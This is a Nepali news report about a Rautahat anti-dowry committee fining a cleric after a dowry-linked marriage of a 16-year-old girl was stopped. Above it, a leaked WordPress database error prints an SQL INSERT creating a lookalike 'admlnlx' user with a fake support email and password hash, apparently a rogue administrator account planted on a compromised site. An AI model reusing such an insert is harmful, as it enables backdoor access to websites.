WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGZTNi6//LmCASagZbiLT3oxncSvQD/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 09:59:04', '', 'admlnlx', 'admlnlx')
अभिमनु कुमार पटेल,
रौतहट, पुस ५–
दाईजो प्रथा बन्द अभियान रौतहटले सोमबार एक जना विवाह गराउने कन्कपुर वार्ड नं २ नहरटोलका मौगलाना शेख मुस्तुफालाई ५० हजार जरिवाना गरि समाजिक कारवाही गरेको छ ।
कन्कपुर वार्ड नं ६ जंगलसहिया टोलका शेख ओकिलको १६ वर्षीय छोरी बचिया खातुनसँग राजपुर फरहदावा वार्ड नं ५ का शेख जाकिरले आफनो २२ वर्षीय छोरा शेख सकिलको विवाह गर्नका लागि २ लाख ५० हजार दाईजो लिएर विवाह गराउन जयन्ती लिई बिहानै कनकपुर जाँदा कारवाही गरिएको हो । दाईजो लिएको बारे जानकारी पाएपछि समितिका सदस्य शेख दाउदले जिल्ला प्रशासन कार्यालय, जिल्ला प्रहरी कार्यालयमा जानकारी गराई विवाह रोकेका थिए ।
विवाह रोकेपछि जिल्लाबाट प्रहरी गई समाजले रोक नमानेपछि बेहुला पक्ष, बेहुली पक्ष र मौगलाना माथि कारवाही गरि दाईजो लिएको रकम फिर्ता गराई बिना दाईजोको त्यही जयन्ती लिएर गएको केटो सँग विहे गराएको थियो ।
समाजमा दाईजो प्रथाले गर्दा महिला माथि दिन प्रति दिन बढदै गई रहेको घट्नालाई न्यूनीकरण गर्नको लागि दाईजो प्रथा मुक्त समाज बनाउने उदेश्यका साथ यो समिति अहिले सक्रिय छ ।
केही दिनअघि रौतहटमा मुस्लिम समाजका शिक्षित जिल्ला अगुवाहरुले प्रमुख जिल्ला अधिकारी, प्रमुख जिल्ला प्रहरी र विभिन्न संघ संस्थाका प्रमुख प्रतिनिधीहरुका बैठक बसाई मुस्लिम समाजमा अब हुने विवाह गरिब वा धनी कुनै परिवारमा बिना दाईजाको विवाह गरिने, दाईजो दिने छोरी पक्ष वा लिने छोरा र विवाह गराउने मौगलाना समेतलाई कारवाही गरि जरिवान गर्ने निर्णय दाईजो प्रथा बन्द अभियान समिति गठन गरेको थिए ।